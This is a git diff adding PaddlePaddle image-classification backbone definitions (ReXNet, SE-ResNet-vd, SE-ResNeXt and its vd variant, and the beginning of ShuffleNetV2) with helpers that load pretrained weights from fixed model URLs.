+ +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import paddle +from paddle import ParamAttr +import paddle.nn as nn +from math import ceil + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "ReXNet_1_0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ReXNet_1_0_pretrained.pdparams", + "ReXNet_1_3": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ReXNet_1_3_pretrained.pdparams", + "ReXNet_1_5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ReXNet_1_5_32x4d_pretrained.pdparams", + "ReXNet_2_0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ReXNet_2_0_pretrained.pdparams", + "ReXNet_3_0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ReXNet_3_0_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +def conv_bn_act(out, + in_channels, + channels, + kernel=1, + stride=1, + pad=0, + num_group=1, + active=True, + relu6=False): + out.append( + nn.Conv2D( + in_channels, + channels, + kernel, + stride, + pad, + groups=num_group, + bias_attr=False)) + out.append(nn.BatchNorm2D(channels)) + if active: + out.append(nn.ReLU6() if relu6 else nn.ReLU()) + + +def conv_bn_swish(out, + in_channels, + channels, + kernel=1, + stride=1, + pad=0, + num_group=1): + out.append( + nn.Conv2D( + in_channels, + channels, + kernel, + stride, + pad, + groups=num_group, + bias_attr=False)) + out.append(nn.BatchNorm2D(channels)) + out.append(nn.Swish()) + + +class SE(nn.Layer): + def __init__(self, in_channels, channels, se_ratio=12): + super(SE, self).__init__() + self.avg_pool = nn.AdaptiveAvgPool2D(1) + self.fc = nn.Sequential( + nn.Conv2D( + in_channels, channels // se_ratio, kernel_size=1, padding=0), + nn.BatchNorm2D(channels // se_ratio), + nn.ReLU(), + nn.Conv2D( + channels // se_ratio, channels, kernel_size=1, padding=0), + nn.Sigmoid()) + + def forward(self, 
x): + y = self.avg_pool(x) + y = self.fc(y) + return x * y + + +class LinearBottleneck(nn.Layer): + def __init__(self, + in_channels, + channels, + t, + stride, + use_se=True, + se_ratio=12, + **kwargs): + super(LinearBottleneck, self).__init__(**kwargs) + self.use_shortcut = stride == 1 and in_channels <= channels + self.in_channels = in_channels + self.out_channels = channels + + out = [] + if t != 1: + dw_channels = in_channels * t + conv_bn_swish(out, in_channels=in_channels, channels=dw_channels) + else: + dw_channels = in_channels + + conv_bn_act( + out, + in_channels=dw_channels, + channels=dw_channels, + kernel=3, + stride=stride, + pad=1, + num_group=dw_channels, + active=False) + + if use_se: + out.append(SE(dw_channels, dw_channels, se_ratio)) + + out.append(nn.ReLU6()) + conv_bn_act( + out, + in_channels=dw_channels, + channels=channels, + active=False, + relu6=True) + self.out = nn.Sequential(*out) + + def forward(self, x): + out = self.out(x) + if self.use_shortcut: + out[:, 0:self.in_channels] += x + + return out + + +class ReXNetV1(nn.Layer): + def __init__(self, + input_ch=16, + final_ch=180, + width_mult=1.0, + depth_mult=1.0, + class_num=1000, + use_se=True, + se_ratio=12, + dropout_ratio=0.2, + bn_momentum=0.9): + super(ReXNetV1, self).__init__() + + layers = [1, 2, 2, 3, 3, 5] + strides = [1, 2, 2, 2, 1, 2] + use_ses = [False, False, True, True, True, True] + + layers = [ceil(element * depth_mult) for element in layers] + strides = sum([[element] + [1] * (layers[idx] - 1) + for idx, element in enumerate(strides)], []) + if use_se: + use_ses = sum([[element] * layers[idx] + for idx, element in enumerate(use_ses)], []) + else: + use_ses = [False] * sum(layers[:]) + ts = [1] * layers[0] + [6] * sum(layers[1:]) + + self.depth = sum(layers[:]) * 3 + stem_channel = 32 / width_mult if width_mult < 1.0 else 32 + inplanes = input_ch / width_mult if width_mult < 1.0 else input_ch + + features = [] + in_channels_group = [] + channels_group = [] + + # The 
following channel configuration is a simple instance to make each layer become an expand layer. + for i in range(self.depth // 3): + if i == 0: + in_channels_group.append(int(round(stem_channel * width_mult))) + channels_group.append(int(round(inplanes * width_mult))) + else: + in_channels_group.append(int(round(inplanes * width_mult))) + inplanes += final_ch / (self.depth // 3 * 1.0) + channels_group.append(int(round(inplanes * width_mult))) + + conv_bn_swish( + features, + 3, + int(round(stem_channel * width_mult)), + kernel=3, + stride=2, + pad=1) + + for block_idx, (in_c, c, t, s, se) in enumerate( + zip(in_channels_group, channels_group, ts, strides, use_ses)): + features.append( + LinearBottleneck( + in_channels=in_c, + channels=c, + t=t, + stride=s, + use_se=se, + se_ratio=se_ratio)) + + pen_channels = int(1280 * width_mult) + conv_bn_swish(features, c, pen_channels) + + features.append(nn.AdaptiveAvgPool2D(1)) + self.features = nn.Sequential(*features) + self.output = nn.Sequential( + nn.Dropout(dropout_ratio), + nn.Conv2D( + pen_channels, class_num, 1, bias_attr=True)) + + def forward(self, x): + x = self.features(x) + x = self.output(x).squeeze(axis=-1).squeeze(axis=-1) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." 
+ ) + + +def ReXNet_1_0(pretrained=False, use_ssld=False, **kwargs): + model = ReXNetV1(width_mult=1.0, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ReXNet_1_0"], use_ssld=use_ssld) + return model + + +def ReXNet_1_3(pretrained=False, use_ssld=False, **kwargs): + model = ReXNetV1(width_mult=1.3, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ReXNet_1_3"], use_ssld=use_ssld) + return model + + +def ReXNet_1_5(pretrained=False, use_ssld=False, **kwargs): + model = ReXNetV1(width_mult=1.5, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ReXNet_1_5"], use_ssld=use_ssld) + return model + + +def ReXNet_2_0(pretrained=False, use_ssld=False, **kwargs): + model = ReXNetV1(width_mult=2.0, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ReXNet_2_0"], use_ssld=use_ssld) + return model + + +def ReXNet_3_0(pretrained=False, use_ssld=False, **kwargs): + model = ReXNetV1(width_mult=3.0, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ReXNet_3_0"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/se_resnet_vd.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/se_resnet_vd.py new file mode 100644 index 0000000..205feec --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/se_resnet_vd.py @@ -0,0 +1,390 @@ +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "SE_ResNet18_vd": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SE_ResNet18_vd_pretrained.pdparams", + "SE_ResNet34_vd": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SE_ResNet34_vd_pretrained.pdparams", + "SE_ResNet50_vd": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SE_ResNet50_vd_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__( + self, + num_channels, + num_filters, + filter_size, + stride=1, + groups=1, + is_vd_mode=False, + act=None, + name=None, ): + super(ConvBNLayer, self).__init__() + + self.is_vd_mode = is_vd_mode + self._pool2d_avg = AvgPool2D( + kernel_size=2, stride=2, padding=0, ceil_mode=True) + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + if name == "conv1": + bn_name = "bn_" + name + else: + bn_name = "bn" + name[3:] + self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr(name=bn_name + '_scale'), + bias_attr=ParamAttr(bn_name + '_offset'), + moving_mean_name=bn_name + '_mean', + moving_variance_name=bn_name + '_variance') + + def forward(self, inputs): + if self.is_vd_mode: + inputs = self._pool2d_avg(inputs) + y = self._conv(inputs) + y = self._batch_norm(y) + return y + + +class 
BottleneckBlock(nn.Layer): + def __init__(self, + num_channels, + num_filters, + stride, + shortcut=True, + if_first=False, + reduction_ratio=16, + name=None): + super(BottleneckBlock, self).__init__() + + self.conv0 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + act='relu', + name=name + "_branch2a") + self.conv1 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + stride=stride, + act='relu', + name=name + "_branch2b") + self.conv2 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters * 4, + filter_size=1, + act=None, + name=name + "_branch2c") + self.scale = SELayer( + num_channels=num_filters * 4, + num_filters=num_filters * 4, + reduction_ratio=reduction_ratio, + name='fc_' + name) + + if not shortcut: + self.short = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters * 4, + filter_size=1, + stride=1, + is_vd_mode=False if if_first else True, + name=name + "_branch1") + + self.shortcut = shortcut + + def forward(self, inputs): + y = self.conv0(inputs) + conv1 = self.conv1(y) + conv2 = self.conv2(conv1) + scale = self.scale(conv2) + + if self.shortcut: + short = inputs + else: + short = self.short(inputs) + y = paddle.add(x=short, y=scale) + y = F.relu(y) + return y + + +class BasicBlock(nn.Layer): + def __init__(self, + num_channels, + num_filters, + stride, + shortcut=True, + if_first=False, + reduction_ratio=16, + name=None): + super(BasicBlock, self).__init__() + self.stride = stride + self.conv0 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=3, + stride=stride, + act='relu', + name=name + "_branch2a") + self.conv1 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + act=None, + name=name + "_branch2b") + + self.scale = SELayer( + num_channels=num_filters, + num_filters=num_filters, + reduction_ratio=reduction_ratio, + name='fc_' + name) + + if not shortcut: + self.short = 
ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + stride=1, + is_vd_mode=False if if_first else True, + name=name + "_branch1") + + self.shortcut = shortcut + + def forward(self, inputs): + y = self.conv0(inputs) + conv1 = self.conv1(y) + scale = self.scale(conv1) + + if self.shortcut: + short = inputs + else: + short = self.short(inputs) + y = paddle.add(x=short, y=scale) + y = F.relu(y) + return y + + +class SELayer(nn.Layer): + def __init__(self, num_channels, num_filters, reduction_ratio, name=None): + super(SELayer, self).__init__() + + self.pool2d_gap = AdaptiveAvgPool2D(1) + + self._num_channels = num_channels + + med_ch = int(num_channels / reduction_ratio) + stdv = 1.0 / math.sqrt(num_channels * 1.0) + self.squeeze = Linear( + num_channels, + med_ch, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name=name + "_sqz_weights"), + bias_attr=ParamAttr(name=name + '_sqz_offset')) + + stdv = 1.0 / math.sqrt(med_ch * 1.0) + self.excitation = Linear( + med_ch, + num_filters, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name=name + "_exc_weights"), + bias_attr=ParamAttr(name=name + '_exc_offset')) + + def forward(self, input): + pool = self.pool2d_gap(input) + pool = paddle.squeeze(pool, axis=[2, 3]) + squeeze = self.squeeze(pool) + squeeze = F.relu(squeeze) + excitation = self.excitation(squeeze) + excitation = F.sigmoid(excitation) + excitation = paddle.unsqueeze(excitation, axis=[2, 3]) + out = input * excitation + return out + + +class SE_ResNet_vd(nn.Layer): + def __init__(self, layers=50, class_num=1000): + super(SE_ResNet_vd, self).__init__() + + self.layers = layers + supported_layers = [18, 34, 50, 101, 152, 200] + assert layers in supported_layers, \ + "supported layers are {} but input layer is {}".format( + supported_layers, layers) + + if layers == 18: + depth = [2, 2, 2, 2] + elif layers == 34 or layers == 50: + depth = [3, 4, 6, 3] + elif layers == 101: + depth = [3, 4, 23, 3] + elif 
layers == 152: + depth = [3, 8, 36, 3] + elif layers == 200: + depth = [3, 12, 48, 3] + num_channels = [64, 256, 512, + 1024] if layers >= 50 else [64, 64, 128, 256] + num_filters = [64, 128, 256, 512] + + self.conv1_1 = ConvBNLayer( + num_channels=3, + num_filters=32, + filter_size=3, + stride=2, + act='relu', + name="conv1_1") + self.conv1_2 = ConvBNLayer( + num_channels=32, + num_filters=32, + filter_size=3, + stride=1, + act='relu', + name="conv1_2") + self.conv1_3 = ConvBNLayer( + num_channels=32, + num_filters=64, + filter_size=3, + stride=1, + act='relu', + name="conv1_3") + self.pool2d_max = MaxPool2D(kernel_size=3, stride=2, padding=1) + + self.block_list = [] + if layers >= 50: + for block in range(len(depth)): + shortcut = False + for i in range(depth[block]): + if layers in [101, 152] and block == 2: + if i == 0: + conv_name = "res" + str(block + 2) + "a" + else: + conv_name = "res" + str(block + 2) + "b" + str(i) + else: + conv_name = "res" + str(block + 2) + chr(97 + i) + bottleneck_block = self.add_sublayer( + 'bb_%d_%d' % (block, i), + BottleneckBlock( + num_channels=num_channels[block] + if i == 0 else num_filters[block] * 4, + num_filters=num_filters[block], + stride=2 if i == 0 and block != 0 else 1, + shortcut=shortcut, + if_first=block == i == 0, + name=conv_name)) + self.block_list.append(bottleneck_block) + shortcut = True + else: + for block in range(len(depth)): + shortcut = False + for i in range(depth[block]): + conv_name = "res" + str(block + 2) + chr(97 + i) + basic_block = self.add_sublayer( + 'bb_%d_%d' % (block, i), + BasicBlock( + num_channels=num_channels[block] + if i == 0 else num_filters[block], + num_filters=num_filters[block], + stride=2 if i == 0 and block != 0 else 1, + shortcut=shortcut, + if_first=block == i == 0, + name=conv_name)) + self.block_list.append(basic_block) + shortcut = True + + self.pool2d_avg = AdaptiveAvgPool2D(1) + + self.pool2d_avg_channels = num_channels[-1] * 2 + + stdv = 1.0 / 
math.sqrt(self.pool2d_avg_channels * 1.0) + + self.out = Linear( + self.pool2d_avg_channels, + class_num, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name="fc6_weights"), + bias_attr=ParamAttr(name="fc6_offset")) + + def forward(self, inputs): + y = self.conv1_1(inputs) + y = self.conv1_2(y) + y = self.conv1_3(y) + y = self.pool2d_max(y) + for block in self.block_list: + y = block(y) + y = self.pool2d_avg(y) + y = paddle.reshape(y, shape=[-1, self.pool2d_avg_channels]) + y = self.out(y) + return y + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def SE_ResNet18_vd(pretrained=False, use_ssld=False, **kwargs): + model = SE_ResNet_vd(layers=18, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["SE_ResNet18_vd"], use_ssld=use_ssld) + return model + + +def SE_ResNet34_vd(pretrained=False, use_ssld=False, **kwargs): + model = SE_ResNet_vd(layers=34, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["SE_ResNet34_vd"], use_ssld=use_ssld) + return model + + +def SE_ResNet50_vd(pretrained=False, use_ssld=False, **kwargs): + model = SE_ResNet_vd(layers=50, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["SE_ResNet50_vd"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/se_resnext.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/se_resnext.py new file mode 100644 index 0000000..8b7149e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/se_resnext.py @@ -0,0 +1,364 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. 
class ConvBNLayer(nn.Layer):
    """Conv2D followed by BatchNorm with an optional fused activation.

    *name* seeds the persistable-parameter names ("<name>_weights",
    "<name>_bn_*") so checkpoints keep the original layout.
    """

    def __init__(self,
                 num_channels,
                 num_filters,
                 filter_size,
                 stride=1,
                 groups=1,
                 act=None,
                 name=None,
                 data_format='NCHW'):
        super().__init__()

        # (k - 1) // 2 keeps the spatial size for odd kernels at stride 1.
        self._conv = Conv2D(
            in_channels=num_channels,
            out_channels=num_filters,
            kernel_size=filter_size,
            stride=stride,
            padding=(filter_size - 1) // 2,
            groups=groups,
            weight_attr=ParamAttr(name=name + "_weights"),
            bias_attr=False,
            data_format=data_format)
        norm_prefix = name + '_bn'
        self._batch_norm = BatchNorm(
            num_filters,
            act=act,
            param_attr=ParamAttr(name=norm_prefix + '_scale'),
            bias_attr=ParamAttr(norm_prefix + '_offset'),
            moving_mean_name=norm_prefix + '_mean',
            moving_variance_name=norm_prefix + '_variance',
            data_layout=data_format)

    def forward(self, inputs):
        return self._batch_norm(self._conv(inputs))
class SELayer(nn.Layer):
    """Squeeze-and-Excitation channel recalibration (NCHW or NHWC)."""

    def __init__(self,
                 num_channels,
                 num_filters,
                 reduction_ratio,
                 name=None,
                 data_format="NCHW"):
        super().__init__()

        self.data_format = data_format
        self.pool2d_gap = AdaptiveAvgPool2D(1, data_format=self.data_format)

        self._num_channels = num_channels

        med_ch = int(num_channels / reduction_ratio)
        bound = 1.0 / math.sqrt(num_channels * 1.0)
        self.squeeze = Linear(
            num_channels,
            med_ch,
            weight_attr=ParamAttr(
                initializer=Uniform(-bound, bound), name=name + "_sqz_weights"),
            bias_attr=ParamAttr(name=name + '_sqz_offset'))
        self.relu = nn.ReLU()
        bound = 1.0 / math.sqrt(med_ch * 1.0)
        self.excitation = Linear(
            med_ch,
            num_filters,
            weight_attr=ParamAttr(
                initializer=Uniform(-bound, bound), name=name + "_exc_weights"),
            bias_attr=ParamAttr(name=name + '_exc_offset'))
        self.sigmoid = nn.Sigmoid()

    def forward(self, input):
        # Global average pool, then drop the spatial axes so the FC
        # layers see [N, C]; axis positions depend on the data layout.
        spatial_axes = [1, 2] if self.data_format == "NHWC" else [2, 3]
        gap = paddle.squeeze(self.pool2d_gap(input), axis=spatial_axes)
        attn = self.relu(self.squeeze(gap))
        attn = self.sigmoid(self.excitation(attn))
        attn = paddle.unsqueeze(attn, axis=spatial_axes)
        # Scale each input channel by its learned weight.
        return input * attn
supported_cardinality, \ + "supported cardinality is {} but input cardinality is {}" \ + .format(supported_cardinality, cardinality) + if layers == 50: + depth = [3, 4, 6, 3] + elif layers == 101: + depth = [3, 4, 23, 3] + elif layers == 152: + depth = [3, 8, 36, 3] + num_channels = [64, 256, 512, 1024] + num_filters = [128, 256, 512, + 1024] if cardinality == 32 else [256, 512, 1024, 2048] + if layers < 152: + self.conv = ConvBNLayer( + num_channels=self.input_image_channel, + num_filters=64, + filter_size=7, + stride=2, + act='relu', + name="conv1", + data_format=self.data_format) + else: + self.conv1_1 = ConvBNLayer( + num_channels=self.input_image_channel, + num_filters=64, + filter_size=3, + stride=2, + act='relu', + name="conv1", + data_format=self.data_format) + self.conv1_2 = ConvBNLayer( + num_channels=64, + num_filters=64, + filter_size=3, + stride=1, + act='relu', + name="conv2", + data_format=self.data_format) + self.conv1_3 = ConvBNLayer( + num_channels=64, + num_filters=128, + filter_size=3, + stride=1, + act='relu', + name="conv3", + data_format=self.data_format) + + self.pool2d_max = MaxPool2D( + kernel_size=3, stride=2, padding=1, data_format=self.data_format) + + self.block_list = [] + n = 1 if layers == 50 or layers == 101 else 3 + for block in range(len(depth)): + n += 1 + shortcut = False + for i in range(depth[block]): + bottleneck_block = self.add_sublayer( + 'bb_%d_%d' % (block, i), + BottleneckBlock( + num_channels=num_channels[block] if i == 0 else + num_filters[block] * int(64 // self.cardinality), + num_filters=num_filters[block], + stride=2 if i == 0 and block != 0 else 1, + cardinality=self.cardinality, + reduction_ratio=self.reduction_ratio, + shortcut=shortcut, + if_first=block == 0, + name=str(n) + '_' + str(i + 1), + data_format=self.data_format)) + self.block_list.append(bottleneck_block) + shortcut = True + + self.pool2d_avg = AdaptiveAvgPool2D(1, data_format=self.data_format) + + self.pool2d_avg_channels = num_channels[-1] * 2 + 
+ stdv = 1.0 / math.sqrt(self.pool2d_avg_channels * 1.0) + + self.out = Linear( + self.pool2d_avg_channels, + class_num, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name="fc6_weights"), + bias_attr=ParamAttr(name="fc6_offset")) + + def forward(self, inputs): + with paddle.static.amp.fp16_guard(): + if self.data_format == "NHWC": + inputs = paddle.tensor.transpose(inputs, [0, 2, 3, 1]) + inputs.stop_gradient = True + if self.layers < 152: + y = self.conv(inputs) + else: + y = self.conv1_1(inputs) + y = self.conv1_2(y) + y = self.conv1_3(y) + y = self.pool2d_max(y) + for i, block in enumerate(self.block_list): + y = block(y) + y = self.pool2d_avg(y) + y = paddle.reshape(y, shape=[-1, self.pool2d_avg_channels]) + y = self.out(y) + return y + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." 
+ ) + + +def SE_ResNeXt50_32x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=50, cardinality=32, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["SE_ResNeXt50_32x4d"], use_ssld=use_ssld) + return model + + +def SE_ResNeXt101_32x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=101, cardinality=32, **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["SE_ResNeXt101_32x4d"], + use_ssld=use_ssld) + return model + + +def SE_ResNeXt152_64x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=152, cardinality=64, **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["SE_ResNeXt152_64x4d"], + use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/se_resnext_vd.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/se_resnext_vd.py new file mode 100644 index 0000000..b23b0d2 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/se_resnext_vd.py @@ -0,0 +1,321 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
# Pretrained-weight download URLs, keyed by architecture name.
# BUG FIX: the second entry was a duplicate of "SE_ResNeXt50_vd_32x4d",
# so MODEL_URLS["SE_ResNeXt101_vd_32x4d"] raised KeyError when
# SE_ResNeXt101_vd_32x4d(pretrained=True) was called, and the name was
# missing from __all__ (which is built from these keys).
MODEL_URLS = {
    "SE_ResNeXt50_vd_32x4d":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SE_ResNeXt50_vd_32x4d_pretrained.pdparams",
    # URL follows the naming scheme of the other entries — verify it resolves.
    "SE_ResNeXt101_vd_32x4d":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SE_ResNeXt101_vd_32x4d_pretrained.pdparams",
    "SENet154_vd":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SENet154_vd_pretrained.pdparams",
}
+ num_filters, + stride, + cardinality, + reduction_ratio, + shortcut=True, + if_first=False, + name=None): + super(BottleneckBlock, self).__init__() + + self.conv0 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + act='relu', + name='conv' + name + '_x1') + self.conv1 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + groups=cardinality, + stride=stride, + act='relu', + name='conv' + name + '_x2') + self.conv2 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters * 2 if cardinality == 32 else num_filters, + filter_size=1, + act=None, + name='conv' + name + '_x3') + self.scale = SELayer( + num_channels=num_filters * 2 if cardinality == 32 else num_filters, + num_filters=num_filters * 2 if cardinality == 32 else num_filters, + reduction_ratio=reduction_ratio, + name='fc' + name) + + if not shortcut: + self.short = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters * 2 + if cardinality == 32 else num_filters, + filter_size=1, + stride=1, + is_vd_mode=False if if_first else True, + name='conv' + name + '_prj') + + self.shortcut = shortcut + + def forward(self, inputs): + y = self.conv0(inputs) + conv1 = self.conv1(y) + conv2 = self.conv2(conv1) + scale = self.scale(conv2) + + if self.shortcut: + short = inputs + else: + short = self.short(inputs) + y = paddle.add(x=short, y=scale) + y = F.relu(y) + return y + + +class SELayer(nn.Layer): + def __init__(self, num_channels, num_filters, reduction_ratio, name=None): + super(SELayer, self).__init__() + + self.pool2d_gap = AdaptiveAvgPool2D(1) + + self._num_channels = num_channels + + med_ch = int(num_channels / reduction_ratio) + stdv = 1.0 / math.sqrt(num_channels * 1.0) + self.squeeze = Linear( + num_channels, + med_ch, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name=name + "_sqz_weights"), + bias_attr=ParamAttr(name=name + '_sqz_offset')) + self.relu = nn.ReLU() + stdv = 1.0 / math.sqrt(med_ch 
    def forward(self, input):
        # Squeeze: global average pool to [N, C, 1, 1], then drop the
        # spatial dims so the FC layers see [N, C].
        pool = self.pool2d_gap(input)
        pool = paddle.squeeze(pool, axis=[2, 3])
        squeeze = self.squeeze(pool)
        squeeze = self.relu(squeeze)
        # Excitation: produce per-channel weights in (0, 1) via sigmoid,
        # then restore the spatial dims for broadcasting.
        excitation = self.excitation(squeeze)
        excitation = self.sigmoid(excitation)
        excitation = paddle.unsqueeze(excitation, axis=[2, 3])
        # Recalibrate: scale each input channel by its learned weight.
        out = paddle.multiply(input, excitation)
        return out
shortcut = False + for i in range(depth[block]): + bottleneck_block = self.add_sublayer( + 'bb_%d_%d' % (block, i), + BottleneckBlock( + num_channels=num_channels[block] if i == 0 else + num_filters[block] * int(64 // self.cardinality), + num_filters=num_filters[block], + stride=2 if i == 0 and block != 0 else 1, + cardinality=self.cardinality, + reduction_ratio=self.reduction_ratio, + shortcut=shortcut, + if_first=block == 0, + name=str(n) + '_' + str(i + 1))) + self.block_list.append(bottleneck_block) + shortcut = True + + self.pool2d_avg = AdaptiveAvgPool2D(1) + + self.pool2d_avg_channels = num_channels[-1] * 2 + + stdv = 1.0 / math.sqrt(self.pool2d_avg_channels * 1.0) + + self.out = Linear( + self.pool2d_avg_channels, + class_num, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name="fc6_weights"), + bias_attr=ParamAttr(name="fc6_offset")) + + def forward(self, inputs): + y = self.conv1_1(inputs) + y = self.conv1_2(y) + y = self.conv1_3(y) + y = self.pool2d_max(y) + for block in self.block_list: + y = block(y) + y = self.pool2d_avg(y) + y = paddle.reshape(y, shape=[-1, self.pool2d_avg_channels]) + y = self.out(y) + return y + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." 
def SENet154_vd(pretrained=False, use_ssld=False, **kwargs):
    """Build SENet154_vd (SE-ResNeXt152 64x4d, vd variant)."""
    net = ResNeXt(layers=152, cardinality=64, **kwargs)
    _load_pretrained(
        pretrained, net, MODEL_URLS["SENet154_vd"], use_ssld=use_ssld)
    return net
def channel_shuffle(x, groups):
    """Interleave channels across *groups* (ShuffleNetV2 channel shuffle).

    [N, C, H, W] -> [N, g, C/g, H, W] -> swap the group axes -> flatten
    back to [N, C, H, W], so information mixes between branch halves.
    """
    batch_size, num_channels, height, width = x.shape[0:4]
    per_group = num_channels // groups

    shuffled = reshape(
        x=x, shape=[batch_size, groups, per_group, height, width])
    shuffled = transpose(x=shuffled, perm=[0, 2, 1, 3, 4])
    return reshape(
        x=shuffled, shape=[batch_size, num_channels, height, width])
